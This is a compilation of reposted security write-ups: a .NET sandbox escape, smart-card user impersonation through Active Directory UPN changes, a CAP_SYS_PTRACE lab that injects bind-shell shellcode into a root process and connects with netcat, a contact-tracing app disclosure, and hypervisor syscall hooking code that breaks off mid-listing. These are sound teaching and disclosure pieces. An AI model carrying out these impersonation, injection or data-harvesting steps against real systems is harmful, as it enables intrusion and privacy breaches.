Thursday, 7 May 2020 Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073) It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text: Cannot serialize delegates over unmanaged function pointers, dynamic methods or methods outside the delegate creator's assembly. I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates. It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug. .NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops. What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame. However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen. The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype: void Callback(object obj, EventArgs e) and would call the File.OpenRead function which has the prototype: FileStream OpenRead(string path). That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like? EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath") Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL: ldsfld class Program/'<>c' Program/'<>c'::'<>9' ldftn instance void Program/'<>c'::'<Main>b__0_0'(object, class [mscorlib]System.EventArgs) newobj instance void [mscorlib]System.EventHandler::.ctor(object, native int) view rawdelegate.il hosted with ❤ by GitHub Turns out there's another way. See if you can spot the difference here. Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath") EventHandle f = lambda.Compile() We're still using a lambda, surely nothing has changed? We'll let's look at the CIL. stloc.0 ldtoken [mscorlib]System.Object call class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle) ldstr "o" call class [System.Core]System.Linq.Expressions.ParameterExpression [System.Core]System.Linq.Expressions.Expression::Parameter(class [mscorlib]System.Type, string) stloc.2 ldtoken [mscorlib]System.EventArgs call class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle) ldstr "e" call class [System.Core]System.Linq.Expressions.ParameterExpression [System.Core]System.Linq.Expressions.Expression::Parameter(class [mscorlib]System.Type, string) stloc.3 ldnull ldtoken method class [mscorlib]System.IO.FileStream [mscorlib]System.IO.File::OpenRead(string) call class [mscorlib]System.Reflection.MethodBase [mscorlib]System.Reflection.MethodBase::GetMethodFromHandle(valuetype [mscorlib]System.RuntimeMethodHandle) castclass [mscorlib]System.Reflection.MethodInfo ldc.i4.1 newarr [System.Core]System.Linq.Expressions.Expression dup ldc.i4.0 ldstr "C:\\SomePath" ldtoken [mscorlib]System.String call class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle) call class [System.Core]System.Linq.Expressions.ConstantExpression [System.Core]System.Linq.Expressions.Expression::Constant(object, class [mscorlib]System.Type) stelem.ref call class [System.Core]System.Linq.Expressions.MethodCallExpression [System.Core]System.Linq.Expressions.Expression::Call(class [System.Core]System.Linq.Expressions.Expression, class [mscorlib]System.Reflection.MethodInfo, class [System.Core]System.Linq.Expressions.Expression[]) ldc.i4.2 newarr [System.Core]System.Linq.Expressions.ParameterExpression dup ldc.i4.0 ldloc.2 stelem.ref dup ldc.i4.1 ldloc.3 stelem.ref call class [System.Core]System.Linq.Expressions.Expression`1<!!0> [System.Core]System.Linq.Expressions.Expression::Lambda<class [mscorlib]System.EventHandler>(class [System.Core]System.Linq.Expressions.Expression, class [System.Core]System.Linq.Expressions.ParameterExpression[]) stloc.1 ldloc.1 callvirt instance !0 class [System.Core]System.Linq.Expressions.Expression`1<class [mscorlib]System.EventHandler>::Compile() view rawexpression.il hosted with ❤ by GitHub That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set. I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates. Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway. The end result looks like the following: Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore. Posted by tiraniddo at 16:12 Sursa: https://www.tiraniddo.dev/2020/05/old-net-vulnerability-5-security.html
-
Attacking smart cards in active directory Reading time ~9 min Posted by Hector Cuesta on 26 March 2020 Categories: Abuse, Active directory, Research, Smartcards, Windows, Windows events, Forgery, Impersonation, Smartcard Introduction Recently, I encountered a fully password-less environment. Every employee in this company had their own smart card that they used to login into their computers, emails, internal applications and more. None of the employees at the company had a password at all – this sounded really cool. In this post I will detail a technique used to impersonate other users by modifying a User Principal Name (UPN) on an Active Directory domain that only uses smart cards. I want to focus on the smart card aspect, so for context, we start this post assuming we have some NetNTLMv2 hashes that we can neither relay nor crack. Smart Cards and active directory Before abusing any technology its important to understand the basics, so lets take a look on how Active Directory deals with smart cards. If you have some knowledge of windows internals you probably know that NTLM/NetNTLM hashes are important for windows computers to communicate between each other, and these hashes are generated from a secret, usually the password of the user. So how does Active Directory deal with smart cards if the users do not have any password at all? When you setup a user account in Active Directory to use smart cards the account password is automatically changed to a random 120 character string. So, the chances of cracking these are close to zero with current hardware. To make this even more challenging Windows server 2016 has an option to regenerate these random passwords after every interactive login, invalidating previous NTLM hashes if your forest is on the server 2016 level. Alternatively, you can set this password to expire once a day. If you want more information about this setup I encourage you to check out this blogpost. But how does this really work? What does the smart card contain and more importantly, how are smart cards and Active Directory users correlated? How does it really work? The setup that Im going to show you can have small changes, but this is the most common implementation I have encountered. All smart cards contain a certificate with multiple values, one of them being the Subject Alternative Name (SAN). This field contained the email of the user that owned the card, so, for example “hector.cuesta@contoso.local”. To access the certificate on the smart card, the user needed to enter a PIN number validated against the one stored on the smart card. Every time the user wanted to login into their computer, they need to first introduce the smart card and then enter the pin. SAN attribute of the smart card certificate After the pin is entered, the smart card gives the certificate to the computer and this information is forwarded to a domain controller for further validation/authentication. When the domain controller receives the certificate, the signing authority is validated and if the authority is trusted, authentication will proceed. At this point the domain controller knows that the information contained in the certificate can be validated, but how is this certificate correlated with an active directory user? To do this the domain controller extracts the SAN from the certificate “hector.cuesta@contoso.local”, and searches this value against all the User Principle Names (UPN) of Active Directory users. To simplify things, when there is a match, the user’s NTLM hash and some other information are sent back to the computer that initiated the authentication process and the login process can finalise. Smart card login process. At this point we have two options of abusing this technology. First one, try to attack the smart card directly by forging a certificate with an arbitrary SAN. Unless you have a way to break RSA you should not be able to do this. Second; attack the Active Directory environment by modifying the UPN of a victim user to the value of the SAN in your legitimate smart card (i.e. switch the UPN for the victim for yours). When the UPN <-> SAN correlation occurs, domain controllers send back the details for the victim user instead of yours. Who can modify the UPN of a user? The first group of people that come to mind are domain admins, and you may be thinking “What was the point of impersonating someone if you are already domain admin?” But, as I will show later this is still interesting even when you have domain admin privileges. Anyway, changing UPN values is not restricted to only domain admins. Delegation of permissions in Active Directory environments is common, and includes delegating the permission to change a user’s UPN as well. This can be seen in the following Microsoft guidelines which even has a template for making this change. Template to delegate UPN change in Active Directory But why should someone want to delegate this change? Imagine a big company with thousands of employees. Updates to user profiles like; a change of the address/phone number, to correct errors, or address modifications in the name and surname of users are common tasks. Imagine, for example, countries where people change their surname when they get married. Typically, high level IT admins like domain admins don’t perform these incremental changes, instead this kind of low level administration is usually performed by Help Desk users. And as you will see later, a user with permission to change the UPN value of a user can impersonate any other user in Active Directory when using smart cards. As I said before, this is also interesting even if you already have domain admin privileges. Imagine that you manage to compromise the NTLM hash of a domain admin. You are not going to be able to crack it, but you can do pass the hash. You have two main problems, the first being that the NTLM hash is going to become invalid as soon as the domain admin performs an interactive login using their smart card, and the second – when an account is configured to use smart cards you can’t perform interactive logins using pass the hash – so forget about RDP. Alternatively, imagine that you want to login to a computer to obtain some files, but this computer is properly isolated and no remote administrative interfaces are enabled, the only way would be to physically login into the computer and that’s not possible to do using an NTLM hash. However, using the attack I am about to explain you can trick active directory to allow a login to the box using your smart card. Performing the attack Now that you understand the conceptual part of the attack lets go into the practical details on how to execute it. You will need a valid user able to perform UPN changes, a valid smart card, a target account and the dsmod windows utility. First of all you will need to change the UPN of the user associated to your smart card, since active directory does not allow for duplicate UPNs to exist. Change the UPN of your user to a random one. Next you will need to modify the UPN of the target user, modifying their UPN to match the SAN attribute of your smart card. Change the UPN of the victim to match the SAN in your smart card (Your UPN in this case). After this, you simply login to a computer using your smart card and automagically windows will login you as the victim user. Finally, restore the UPNs on the target user, or they are not going to be able to login anymore with their smart card. Restore the UPN of the victim. How to detect/fix At this point you are probably wondering how can you fix or detect this, and I sad to tell you, there is no fix for this as it’s the intended behaviour and how the current integration of smart cards and active directory works. However, there are a few thing that can be done. First of all, monitor for windows events that indicate a change in the UPN such as event ID ‘4738’, and actively verify the legitimacy of these changes as soon as they are performed. Another important action is to review who can perform UPN changes in your organisations and why. In my opinion security is a battle of reducing attack surface, so the fewer users allowed to perform this change the better. In general, the values used for correlation between the smart card and Active Directory, the SPN and UPN in this case, should be treated as sensitive values, just like passwords, by monitoring for changes and controlling who can modify them. Detection from a more offensive point of view and be done with windows utilities like dsacls. Queries in tools like BloodHound could probably be made to obtain a list of users with permissions to change UPNs. References Searching for references of this “attack” I found an article from Roger A. Grimes where he mentioned this same “attack” avenue but using windows GUI tools instead of dsmod, he also mentioned that he heard about this attack in the past but can’t remember who told him about this, so the original author remains unknown. Sursa: https://sensepost.com/blog/2020/attacking-smart-cards-in-active-directory/
-
Privilege Escalation by abusing SYS_PTRACE Linux Capability Nishant Sharma Follow May 8 · 4 min read Linux Capabilities are used to allow binaries (executed by non-root users) to perform privileged operations without providing them all root permissions. There are 40 capabilities supported by the Linux kernel. The list can be found here. This model allows the binary or program to grant specific permissions to perform privileged operations rather than giving them root privileges by granting setuid, setguid or sudo without a password. As this topic is out of the scope of this post, we will encourage the reader to check more on the following links: Linux capabilities in practice Linux Audit Lab Scenario We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment. Lab: The Basics: CAP_SYS_PTRACE This lab comprises a Linux machine with the necessary tools installed on it. The user or practitioner will get a command-line interface (CLI) access to a bash shell inside a running container as the student user, through the web browser. Challenge Statement In this lab, you need to abuse the CAP_SYS_PTRACE to get root on the box! A flag is kept in root’s home directory. Objective: Escalate to the root user and retrieve the flag! Solution Step 1: Find all binaries which have capabilities set for them. Command: getcap -r / 2>/dev/null Finding files with capabilities The CAP_SYS_PTRACE capability is present in the permitted set of /usr/bin/python2.7 binary. As a result, the current user can attach to other processes and trace their system calls. Step 2: Check the services running on the machine. Command: ps -eaf Process Listing (Part I) Process Listing (Part II) Nginx is running on the machine. The Nginx’s master process is running as root and has pid 236. Step 3: Check the architecture of the machine. Command: uname -m Checking system architecture The machine is running 64-bit Linux. Step 4: Search for publicly available TCP BIND shell shellcodes. Search on Google “Linux x64 Bind shell shellcode exploit db”. Searching for shellcode The second Exploit DB link contains a BIND shell shellcode of 87 bytes. Exploit DB Link: https://www.exploit-db.com/exploits/41128 The shellcode The above shellcode will trigger a BIND TCP Shell on port 5600. Step 5: Write a python script to inject the BIND TCP shellcode into the running process. The C program provided at the GitHub Link given below can be used as a reference for writing the python script. GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c Python script: Save the above program as “inject.py” Step 6: Run the python script with the PID of the Nginx master process passed as an argument. Command: python inject.py 236 Shellcode injection If the shellcode was injected successfully, a TCP BIND shell should be running on port 5600. Step 7: Check the TCP listen ports on the machine. Command: netstat -tnlp A process is listening on port 5600. Step 8: Connect to the BIND shell with netcat. Command: nc 127.0.0.1 5600 Check the current user. Command: id Connecting to port 5600 Step 9: Search for the flag file. Command: find / -name flag 2>/dev/null Searching for flag Step 10: Retrieve the flag from the file flag. Command: cat /root/flag Retrieving the flag Flag: 9260b41eaece663c4d9ad5e95e94c260 References: Capabilities ptrace ptrace.h user.h ctypes Linux/x64 — Bind (5600/TCP) Shell Shellcode Mem Inject Sursa: https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc
-
Aarogya Setu: The story of a failure Elliot Alderson Follow May 6 · 5 min read In order to fight Covid19, the Indian government released a mobile contact tracing application called Aarogya Setu. This application is available on the PlayStore and 90 million Indians already installed it. Aarogya Setu - Apps on Google Play Aarogya Setu is a mobile application developed by the Government of India to connect essential health services with the… play.google.com This application is currently getting a lot of attention in India. In Noida, if people doesn’t have the app installed on their phone, a person can be imprisoned up to 6 months or fined up to Rs 1000. No Aarogya Setu app? Pay Rs 1,000 fine or face 6 months jail in Noida "If people download it instantly, we will let them go. We are doing this so that people take the order seriously and… indianexpress.com Access to app internal files On April 3, 2 days after the launch of the app, I decided to give a look to the version 1.0.1 of the application. It was 11:54 pm and I spent less than 2 hours looking at it. At 1:27 am, I found that an activity called WebViewActivity, was behaving weirdly. This activity is a webview and is, in theory, responsible of showing web page like the privacy policy for example. AndroidManifest.xml in Aarogya Setu v1.0.1 The issue is that WebViewActivity was capable of doing a little bit more than that. WebViewActivity in Aarogya Setu v1.0.1 As you can see, the onPageStarted method checked the value of the str parameter. If str: - is tel://[phone number]: it will ask Android to open the dialer and pre-dial the number - doesn’t contain http or https, it does nothing - else it is opening a webview with the specified URI. As you can see there is no host validation at all. So, I tried to open an internal file of the application called FightCorona_prefs.xml by sending the following command As you can see in the following video, it worked fine! Why it’s a problem? With only 1-click an attacker can open any app internal file, included the local database used by the app called fight-covid-db Ability to know who is sick anywhere in India On May 4, I decided to push my analyse a little bit further and I analysed the version v1.1.1 of the app which is the current version. The first thing I noticed is the issue described previously had been fixed silently by the developpers. Indeed, the WebViewActivity is no more accessible from the outside, they removed the intent filters in the AndroidManifest.xml. AndroidManifest.xml in Aarogya Setu v1.1.1 To continue my analysis, I decided to use the app on a rooted device. When I tried, I directly received this message. I decompiled the app and found where this root detection was implemented. In order to bypass it, I wrote a small function in my Frida script. The next challenge was to be able to bypass the certificate pinning implemented in order to be able to monitor the network requests made by the app. Once I done that, I used the app and found an interesting feature In the app, you have the ability to know how many people did a self assessment in your area. You can choose the radius of the area. It can be 500m, 1km, 2kms, 5kms or 10kms. When the user is clicking on one of the distance: - his location is sent: see the lat and lon parameters in the header - the radius choosen is sent: see the dist parameter in the url and the distance parameter in the header The first thing I noticed is that this endpoint returns a lot of info: - Number of infected people - Number of unwell people - Number of people declared as bluetooth positive - Number of self assesment made around you - Number of people using the app around you Because I’m stupid, the 1st thing I tried was to modify the location to see if I was able to get information anywhere in India. The 2nd thing was to modify the radius to 100kms to see if I was able to get info with a radius which is not available in the app. As you can see in the previous screenshot, I set my location to Mumbai and set the radius to 100kms and it worked! What are the consequences? Thanks to this endpoint an attacker can know who is infected anywhere in India, in the area of his choice. I can know if my neighboor is sick for example. Sounds like a privacy issue for me… So I decided to play with it a little bit and checked who was infected in some specific places with a radius of 500 meters: - PMO office: {“infected”:0,”unwell”:5,”bluetoothPositive”:4,”success”:true,”selfAsses”:215,”usersNearBy”:1936} - Ministry of Defense: {“infected”:0,”unwell”:5,”bluetoothPositive”:11,”success”:true,”selfAsses”:123,”usersNearBy”:1375} - Indian Parliament: {“infected”:1,”unwell”:2,”bluetoothPositive”:17,”success”:true,”selfAsses”:225,”usersNearBy”:2338} - Indian Army Headquarters: {“infected”:0,”unwell”:2,”bluetoothPositive”:4,”success”:true,”selfAsses”:91,”usersNearBy”:1302} Disclosure 49 minutes after my initial tweet, NIC and the Indian Cert contacted me. I sent them a small technical report. Few hours after that they released an official statement. To sum up they said “Nothing to see here, move on”. My answer to them is: - As you saw in the article, it was totally possible to use a different radius than the 5 hardcoded values, so clearly they are lying on this point and they know that. They even admit that the default value is now 1km, so they did a change in production after my report - The funny thing is they also admit an user can get the data for multiple locations. Thanks to triangulation, an attacker can get with a meter precision the health status of someone. - Bulk calls are possible my man. I spent my day calling this endpoint and you know it too. I’m happy they quickly answered to my report and fixed some of the issues but seriously: stop lying, stop denying. And don’t forget folks: Hack the planet! ? Sursa: https://medium.com/@fs0c131y/aarogya-setu-the-story-of-a-failure-3a190a18e34
-
In the RuhrSec 2020 #StayAtHome Edition, we present you with a selection of talks planned for RuhrSec 2020. If you enjoy the talk we encourage you to make a donation to the non-profit organization DLRG Hattingen (https://hattingen.dlrg.de/spenden/) (PayPal available). The donation will be used to support the local youth department of the DLRG, which is the largest voluntary lifesaving organization worldwide. --- RuhrSec is the annual English speaking non-profit IT security conference with cutting-edge security talks by renowned experts. Due to the coronavirus, we decided to cancel the RuhrSec 2020. Thanks to our amazing speakers we are able to provide you with a selection of the planned talks in our RuhrSec 2020 #StayAtHome Edition anyway. https://www.ruhrsec.de/ --- RuhrSec 2020 #StayAtHome Edition Episode 1: Efficient Forward Security for TLS 1.3 0-RTT by Kai Gellert Abstract. The TLS 1.3 0-RTT mode enables a client reconnecting to a server to send encrypted application-layer data in "0-RTT" ("zero round-trip time"), without the need for a prior interactive handshake. This fundamentally requires the server to reconstruct the previous session's encryption secrets upon receipt of the client's first message. The standard techniques to achieve this are session caches or, alternatively, session tickets. The former provides forward security and resistance against replay attacks, but requires a large amount of server-side storage. The latter requires negligible storage, but provides no forward security and is known to be vulnerable to replay attacks. In this talk, we discuss which drawbacks the current 0-RTT mode of TLS 1.3 has and which security we actually would like to achieve. We then present a new generic construction of a session resumption protocol and show that it can immediately be used in TLS 1.3 0-RTT and deployed unilaterally by servers, without requiring any changes to clients or the protocol. This yields the first construction that achieves forward security for all messages, including the 0-RTT data. Biography. Kai Gellert is a PhD student at the chair of IT Security and Cryptography at the University of Wuppertal, where he is supervised by Tibor Jager. The focus of his research is the construction and security analysis of forward-secure 0-RTT protocols. His results are published at leading security and cryptography conferences such as Eurocrypt and the Privacy Enhancing Technologies Symposium. Twitter: https://twitter.com/KaiGellert
-
postMessage-tracker Made by Frans Rosén. Presented during the "Attacking modern web technologies"-talk (Slides) at OWASP AppSec Europe back in 2018, but finally released in May 2020. This Chrome extension monitors postMessage-listeners by showing you an indicator about the amount of listeners in the current window. It supports tracking listeners in all subframes of the window. It also keeps track of short-lived listeners and listeners enabled upon interactions. You can also log the listener functions and locations to look them through them at a later stage by using the Log URL-option in the extension. This enables you to find hidden listeners that are only enabled for a short time inside an iframe. It also shows you the interaction between windows inside the console and will specify the windows using a path you can use yourself to replay the message: It also supports tracking communication happening between different windows, using diffwin as sender or receiver in the console. Features Supports Raven, New Relic, Rollbar, Bugsnag and jQuery wrappers and "unpacks" them to show you the real listener. Tries to bypass and reroute wrappers so the Devtools console will show the proper listeners: Using New Relic: After, with postMessage-tracker: Using jQuery: After, with postMessage-tracker: Allows you to set a Log URL inside the extension options to allow you to log all information about each listener to an endpoint by submitting the listener and the function (to be able to look through all listeners later). You can find the options in the Extension Options when clicking the extension in chrome://extensions-page: Supports anonymous functions. Chrome does not support to stringify an anonymous function, in the cases of anonymous functions, you will see the bound-string as the listener: Known issues Since some websites could be served as XML with a XHTML-namespace, it will also attach itself to plain XML-files and will be rendered in the top of the XML. This might confuse you if you look at XML-files in the browser, as the complete injected script is in the DOM of the XML. I haven't found a way to hide it from real XML-files, but still support it for XHTML-namespaces. Sursa: https://github.com/fransr/postMessage-tracker
-
On December 28, 2018 By Aidan Khoury Syscall Hooking Via Extended Feature Enable Register (EFER) Posts Since the dawn of KVA Shadowing (KVAS), similar to Linux’s KPTI, which was developed by Microsoft to mitigate Meltdown vulnerabilities, hooking syscalls among other potentially malicious things has become increasingly difficult in Windows. Upon updating my virtualization toolset which utilizes syscall hooking strategies to assist in control flow analysis, I had trouble when trying to add support for any Windows version with KVAS enabled. This is due to Windows mapping the syscall handler KiSystemCall64Shadow to the kernel shadow page tables. So upon attempting to hook system calls using the LSTAR MSR, I found that the only way to do so was by manually adding my custom LSTAR system call handler to the shadow page tables using MmCreateShadowMapping. This worked well up until the Windows 10 1809 update. Since the 1809 update, the pages of the shadow mapping code in the PAGE section of the kernel are discarded shortly after initialization. I am guessing that Microsoft caught this workaround and dealt with it by discarding the pages. There is no way around this without bootstrapping the kernel it seems. After brainstorming possible solutions, I decided to take a shot at hooking using the Extended Feature Enable Register (EFER) in order to exit on each SYSCALL and subsequent SYSRET instruction and emulate their operations (you can find the definition of the EFER MSR in the Intel Software Developer’s Manual, Volume 3A, under section 2.2.1 Extended Feature Enable Register). Now you’re probably thinking, how is that possible? But the possibilities are nearly endless when you have a subverted processor on your hands! When setting the appropriate bits in the MSR Bitmap, you can control and mask the value of the SYSCALL Enable (or SCE bit) of the EFER MSR. Referencing the Intel Software Developer’s Manual, Volume 2B, under section 4.3 INSTRUCTIONS (M-U), we can clearly see how the SYSCALL instruction operates and notice we can take advantage of the EFER SCE bit (the AMD64 Architecture Programmer’s Manual V3 r3.26 has a practically equivalent instruction reference on page 419 which some may find easier to follow). Taking from the Intel SDM, the SYSCALL instruction operation is as follows: IF (CS.L ≠ 1 ) or (IA32_EFER.LMA ≠ 1) or (IA32_EFER.SCE ≠ 1) (* Not in 64-Bit Mode or SYSCALL/SYSRET not enabled in IA32_EFER *) THEN #UD; FI; RCX ← RIP; (* Will contain address of next instruction *) RIP ← IA32_LSTAR; R11 ← RFLAGS; RFLAGS ← RFLAGS AND NOT(IA32_FMASK); CS.Selector ← IA32_STAR[47:32] AND FFFCH (* Operating system provides CS; RPL forced to 0 *) (* Set rest of CS to a fixed value *) CS.Base ← 0; (* Flat segment *) CS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *) CS.Type ← 11; (* Execute/read code, accessed *) CS.S ← 1; CS.DPL ← 0; CS.P ← 1; CS.L ← 1; (* Entry is to 64-bit mode *) CS.D ← 0; (* Required if CS.L = 1 *) CS.G ← 1; (* 4-KByte granularity *) CPL ← 0; SS.Selector ← IA32_STAR[47:32] + 8; (* SS just above CS *) (* Set rest of SS to a fixed value *) SS.Base ← 0; (* Flat segment *) SS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *) SS.Type ← 3; (* Read/write data, accessed *) SS.S ← 1; SS.DPL ← 0; SS.P ← 1; SS.B ← 1; (* 32-bit stack segment *) SS.G ← 1; (* 4-KByte granularity *) We can see the first line of conditions that cause an Undefined Opcode Exception (#UD) contains a conditional check of the EFER SCE bit. Knowing that if EFER SCE is cleared, we can cause a #UD exception, we now know we can VM-exit on every SYSCALL instruction using the Exception Bitmap. Though with every SYSCALL instruction there should be a subsequent SYSRET instruction inside the system call handler in order to resume execution back to the previous context. SYSRET operates similarly to the SYSCALL instruction, and can think of it as the little cousin of the IRET instruction. Taking from the Intel SDM again, the SYSRET instruction operation is as follows: IF (CS.L ≠ 1 ) or (IA32_EFER.LMA ≠ 1) or (IA32_EFER.SCE ≠ 1) (* Not in 64-Bit Mode or SYSCALL/SYSRET not enabled in IA32_EFER *) THEN #UD; FI; IF (CPL ≠ 0) OR (RCX is not canonical) THEN #GP(0); FI; IF (operand size is 64-bit) THEN (* Return to 64-Bit Mode *) RIP ← RCX; ELSE (* Return to Compatibility Mode *) RIP ← ECX; FI; RFLAGS ← (R11 & 3C7FD7H) | 2; (* Clear RF, VM, reserved bits; set bit 2 *) IF (operand size is 64-bit) THEN CS.Selector ← IA32_STAR[63:48]+16; ELSE CS.Selector ← IA32_STAR[63:48]; FI; CS.Selector ← CS.Selector OR 3; (* RPL forced to 3 *) (* Set rest of CS to a fixed value *) CS.Base ← 0; (* Flat segment *) CS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *) CS.Type ← 11; (* Execute/read code, accessed *) CS.S ← 1; CS.DPL ← 3; CS.P ← 1; IF (operand size is 64-bit) THEN (* Return to 64-Bit Mode *) CS.L ← 1; (* 64-bit code segment *) CS.D ← 0; (* Required if CS.L = 1 *) ELSE (* Return to Compatibility Mode *) CS.L ← 0; (* Compatibility mode *) CS.D ← 1; (* 32-bit code segment *) FI; CS.G ← 1; (* 4-KByte granularity *) CPL ← 3; SS.Selector ← (IA32_STAR[63:48]+8) OR 3; (* RPL forced to 3 *) (* Set rest of SS to a fixed value *) SS.Base ← 0; (* Flat segment *) SS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *) SS.Type ← 3; (* Read/write data, accessed *) SS.S ← 1; SS.DPL ← 3; SS.P ← 1; SS.B ← 1; (* 32-bit stack segment*) SS.G ← 1; (* 4-KByte granularity *) We can see the first line of conditions that cause a #UD exception are the same as the SYSCALL instruction. At this point we know we’re good to start causing VM-exits and emulating system calls, but let’s recap everything we know we have to do: Enable VMX. Setup VM-entry controls in VMCS to load the EFER MSR on VM entry. Setup VM-exit controls in VMCS to save the EFER MSR on VM exit. Setup MSR Bitmap in VMCS to exit on reads and writes to the EFER MSR. Setup Exception Bitmap in VMCS to exit on #UD exceptions. Set the SCE bit on EFER MSR Read VM-exits. Clear (mask off) the SCE bit on EFER MSR Write VM-exits. Handle the #UD instruction to emulate either the SYSCALL or SYSRET instruction. The next problem is detecting whether the #UD was caused by a SYSCALL or SYSRET instruction. For the sake of simplicity, reading opcodes from RIP is sufficient to determine what instruction caused the #UD. KVAS slightly complicates things however so we need to handle this a little differently if the CR3 PCID indicates a user mode directory table base. There is of course more optimal methods than reading the instruction opcodes (e.g. hook the interrupt table itself, or use a toggle or counter to switch between handling syscall or sysret if its safe to assume nothing else will cause a #UD). Emulating the SYSCALL and SYSRET instructions is as easy as just following the instruction operations outlined in the manual. The following code is just a basic emulation, I have purposely left out handling of compatibility and protected mode and the SYSRET #GP exception for simplicity: // // SYSCALL instruction emulation routine // static BOOLEAN VmmpEmulateSYSCALL( IN PVIRTUAL_CPU VirtualCpu ) { X86_SEGMENT_REGISTER Cs, Ss; UINT64 MsrValue; // // Save the address of the instruction following SYSCALL into RCX and then // load RIP from MSR_LSTAR. // MsrValue = ReadMSR( MSR_LSTAR ); VirtualCpu->Context->Rcx = VirtualCpu->Context->Rip; VirtualCpu->Context->Rip = MsrValue; VmcsWrite( VMCS_GUEST_RIP, VirtualCpu->Context->Rip ); // // Save RFLAGS into R11 and then mask RFLAGS using MSR_FMASK. // MsrValue = ReadMSR( MSR_FMASK ); VirtualCpu->Context->R11 = VirtualCpu->Context->Rflags; VirtualCpu->Context->Rflags &= ~(MsrValue | X86_FLAGS_RF); VmcsWrite( VMCS_GUEST_RFLAGS, VirtualCpu->Context->Rflags ); // // Load the CS and SS selectors with values derived from bits 47:32 of MSR_STAR. // MsrValue = ReadMSR( MSR_STAR ); Cs.Selector = (UINT16)((MsrValue >> 32) & ~3); // STAR[47:32] & ~RPL3 Cs.Base = 0; // flat segment Cs.Limit = (UINT32)~0; // 4GB limit Cs.Attributes = 0xA9B; // L+DB+P+S+DPL0+Code VmcsWriteSegment( X86_REG_CS, &Cs ); Ss.Selector = (UINT16)(((MsrValue >> 32) & ~3) + 8); // STAR[47:32] + 8 Ss.Base = 0; // flat segment Ss.Limit = (UINT32)~0; // 4GB limit Ss.Attributes = 0xC93; // G+DB+P+S+DPL0+Data VmcsWriteSegment( X86_REG_SS, &Ss ); return TRUE; } // // SYSRET instruction emulation routine // static BOOLEAN VmmpEmulateSYSRET( IN PVIRTUAL_CPU VirtualCpu ) { X86_SEGMENT_REGISTER Cs, Ss; UINT64 MsrValue; // // Load RIP from RCX. // VirtualCpu->Context->Rip = VirtualCpu->Context->Rcx; VmcsWrite( VMCS_GUEST_RIP, VirtualCpu->Context->Rip ); // // Load RFLAGS from R11. Clear RF, VM, reserved bits. // VirtualCpu->Context->Rflags = (VirtualCpu->Context->R11 & ~(X86_FLAGS_RF | X86_FLAGS_VM | X86_FLAGS_RESERVED_BITS)) | X86_FLAGS_FIXED; VmcsWrite( VMCS_GUEST_RFLAGS, VirtualCpu->Context->Rflags ); // // SYSRET loads the CS and SS selectors with values derived from bits 63:48 of MSR_STAR. // MsrValue = ReadMSR( MSR_STAR ); Cs.Selector = (UINT16)(((MsrValue >> 48) + 16) | 3); // (STAR[63:48]+16) | 3 (* RPL forced to 3 *) Cs.Base = 0; // Flat segment Cs.Limit = (UINT32)~0; // 4GB limit Cs.Attributes = 0xAFB; // L+DB+P+S+DPL3+Code VmcsWriteSegment( X86_REG_CS, &Cs ); 